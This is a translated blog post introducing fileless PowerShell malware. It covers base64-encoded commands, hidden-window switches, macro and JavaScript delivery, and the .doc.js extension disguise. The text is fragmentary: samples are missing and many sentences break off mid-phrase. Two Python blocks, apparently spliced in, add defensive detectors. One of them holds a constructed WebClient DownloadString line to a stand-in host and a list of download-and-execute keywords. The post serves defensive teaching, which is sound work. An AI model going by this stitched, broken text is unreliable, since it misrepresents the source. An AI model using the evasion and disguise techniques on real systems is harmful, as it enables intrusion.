With this article we begin a series of posts about fileless malware. Fileless malware, also known as zero-footprint malware, typically uses PowerShell on Windows systems to quietly run commands that search for and exfiltrate valuable content. Detecting hacker activity when there are no malicious files is a hard problem, because ... antivirus and many other detection systems work on the basis of signature analysis. But the good news is that such software does exist. For example,
When I first started investigating the topic of badass hackers,
The Great and Powerful PowerShell
I wrote about some of these ideas earlier in
Besides the samples themselves, there is a site where you can see what these programs do. Hybrid Analysis runs the malware in its sandbox and monitors system calls, running processes and network activity, and extracts suspicious text strings. For binaries and other executables, i.e. where you cannot look at the actual high-level code, hybrid analysis decides whether the software is malicious or merely suspicious based on its runtime behaviour. And after that the sample is evaluated.
In the case of PowerShell and other script samples (Visual Basic, JavaScript, and so on), I was able to see the code itself. For example, I came across this PowerShell sample:
You can also run PowerShell with base64 encoding to avoid detection. Note the use of the NonInteractive and Hidden parameters.
If you have read my posts on obfuscation, you know that the -e option indicates that the content is base64 encoded. By the way, Hybrid Analysis helps here too by decoding everything back. If you want to try decoding base64 PowerShell (hereafter PS) yourself, you need to run this command:
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
Digging deeper
I decoded our PS script using this method; below is the text of the program, although slightly modified by me:
Note that the script was tied to the date of September 4, 2017 and passed session cookies.
I wrote about this style of attack in
So why?
For security software that monitors Windows event logs or the firewall, base64 encoding keeps the string "WebClient" from being spotted by plaintext pattern matching meant to block such a web request. And since all the "evil" of the malware is downloaded and passed into our PowerShell, this approach therefore lets us evade detection completely. Or at least that is what I thought at first.
It turns out that with Windows PowerShell advanced logging enabled (see my article), you will be able to see the loaded line in the event log. Like me
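The two points above (the -e option carries UTF-16LE text in base64, and a plaintext matcher on the command line never sees "WebClient" while the decoded script block does) can be demonstrated from the defender's side. The following Python is an added example, not code from the post or from Hybrid Analysis: it performs the same transformation as the [Convert]::FromBase64String / Unicode.GetString one-liner over a constructed process-creation command line, and compares what a naive string matcher sees with what the decoded script reveals. The sample plaintext, the SUSPICIOUS list and the example host name are assumptions made for the example.

```python
import base64
import re

# Constructed sample: the plaintext we will hide behind -e. It is an illustrative
# one-liner assumed for this example, not the sample shown in the post.
SAMPLE_PLAINTEXT = "(New-Object System.Net.WebClient).DownloadString('http://example.invalid/x')"

# Strings a naive plaintext matcher on event or proxy logs would key on (assumed list).
SUSPICIOUS = ("WebClient", "DownloadString", "DownloadFile", "Invoke-Expression", "IEX")

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob. PowerShell accepts
# any unambiguous prefix of a parameter name, so all of these spellings work.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def encode_powershell(script: str) -> str:
    """Produce what -EncodedCommand expects: the script as UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def split_encoded(cmdline: str):
    """Return (visible_text, decoded_script).

    decoded_script is None when the command line carries no valid encoded command.
    visible_text is the command line with the base64 blob removed, i.e. exactly
    what a plaintext matcher on the process command line gets to see."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline, None
    visible = cmdline[:m.start(1)] + cmdline[m.end(1):]
    try:
        # Same transformation as [Convert]::FromBase64String + Unicode.GetString
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return visible, None
    return visible, decoded


def triage(cmdline: str) -> dict:
    """Compare what plaintext matching sees with what the decoded script block
    (the line PowerShell script block logging would record) reveals."""
    visible, decoded = split_encoded(cmdline)
    lower = visible.lower()
    return {
        "hidden_window": "-windowstyle hidden" in lower or " -w hidden" in lower,
        "noninteractive": "-noninteractive" in lower or " -noni" in lower,
        "decoded": decoded,
        "visible_hits": [s for s in SUSPICIOUS if s.lower() in lower],
        "decoded_hits": [s for s in SUSPICIOUS
                         if decoded is not None and s.lower() in decoded.lower()],
    }


# Constructed process-creation command lines standing in for event-log entries.
SAMPLE_LINES = [
    "powershell.exe -NonInteractive -WindowStyle Hidden -e " + encode_powershell(SAMPLE_PLAINTEXT),
    "powershell.exe -NoProfile -Command Get-Process",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(triage(line))
```

For the first sample line, visible_hits is empty while decoded_hits lists WebClient and DownloadString: the encoding defeats matching on the command line, which is why the decoded script block that advanced PowerShell logging records is the place to look. The Hidden and NonInteractive switches remain in plain view on the command line and are themselves worth alerting on.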
Let's add a few more scenarios
Hackers cleverly hide PowerShell attacks inside Microsoft Office macros written in Visual Basic and other scripting languages. The idea is that the victim receives a message, say from a delivery service, with a report attached in .doc format. You open this document containing the macro, and it ends up launching the malicious PowerShell itself.
Often the Visual Basic script itself is obfuscated so that it freely slips past antivirus and other malware scanners. In the spirit of the above, I decided to encode the PowerShell above in JavaScript as an exercise. Below is the result of my work:
Obfuscated JavaScript hiding our PowerShell. Real hackers do this once or twice.
Here is another technique I've seen floating around the web: using Wscript.Shell to run the encoded PowerShell. By the way, JavaScript itself is
In our case, the malicious JS script is set up as a file with the .doc.js extension. Windows shows only the first suffix, so to the victim it will look like a Word document.
The JS type is visible only in the scroll-shaped icon. No wonder many people will open this attachment thinking it is a Word document.
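The .doc.js trick relies on Explorer hiding the final extension, so the check a mail gateway or endpoint tool wants is simple: does an executable script extension sit behind a document-like one? The Python below is an added example, not code from the post; the extension lists and the sample attachment names are constructed for it.

```python
import os

# Extensions a victim reads as "a document" (constructed list for this example).
DOCUMENT_LIKE = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".jpg", ".png"}
# Extensions Windows hands to the script host or shell for execution (constructed list).
SCRIPT_LIKE = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1",
               ".bat", ".cmd", ".scr", ".exe", ".lnk"}


def disguised_attachment(filename: str):
    """Return (real_ext, shown_ext) when an executable script extension sits behind
    a document-like one (report.doc.js -> ('.js', '.doc')), otherwise None."""
    base = os.path.basename(filename.replace("\\", "/")).lower()
    root, real_ext = os.path.splitext(base)      # 'report.doc', '.js'
    _, shown_ext = os.path.splitext(root)        # 'report', '.doc'
    if real_ext in SCRIPT_LIKE and shown_ext in DOCUMENT_LIKE:
        return real_ext, shown_ext
    return None


def flag_attachments(names):
    """Map each flagged filename to its (real_ext, shown_ext) pair."""
    return {n: disguised_attachment(n) for n in names if disguised_attachment(n)}


# Constructed attachment names as a mail gateway might log them.
SAMPLE_ATTACHMENTS = [
    "Delivery_Report.doc.js",
    "Invoice_2017.pdf.vbs",
    "Quarterly_Report.docx",
    "setup.exe",
    "C:\\Users\\victim\\Downloads\\scan.jpg.scr",
]

if __name__ == "__main__":
    for name, exts in flag_attachments(SAMPLE_ATTACHMENTS).items():
        print(f"{name}: really {exts[0]}, shown as {exts[1]}")
```

Only the double-extension names are flagged; a plain .docx or a bare .exe is left to other controls. On the user side, the complementary mitigation is turning off Explorer's "hide extensions for known file types" setting (the HideFileExt value under the HKCU Explorer\Advanced key), so the trailing .js is shown next to the scroll icon.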
In my example, I modified the PowerShell above to fetch a script from my website. The remote PS script simply prints "Evil Malware". As you can see, it is not malicious at all. Of course, real hackers are interested in gaining access to a laptop or server, say, through a command shell. In the next article, I will show how to do that using PowerShell Empire.
I hope that in this first article of the series we haven't plunged too deeply into the topic. Now I'll let you catch your breath, and next time we'll start looking at real examples of attacks using fileless malware without any unnecessary introductory words or preparation.
Source: www.habr.com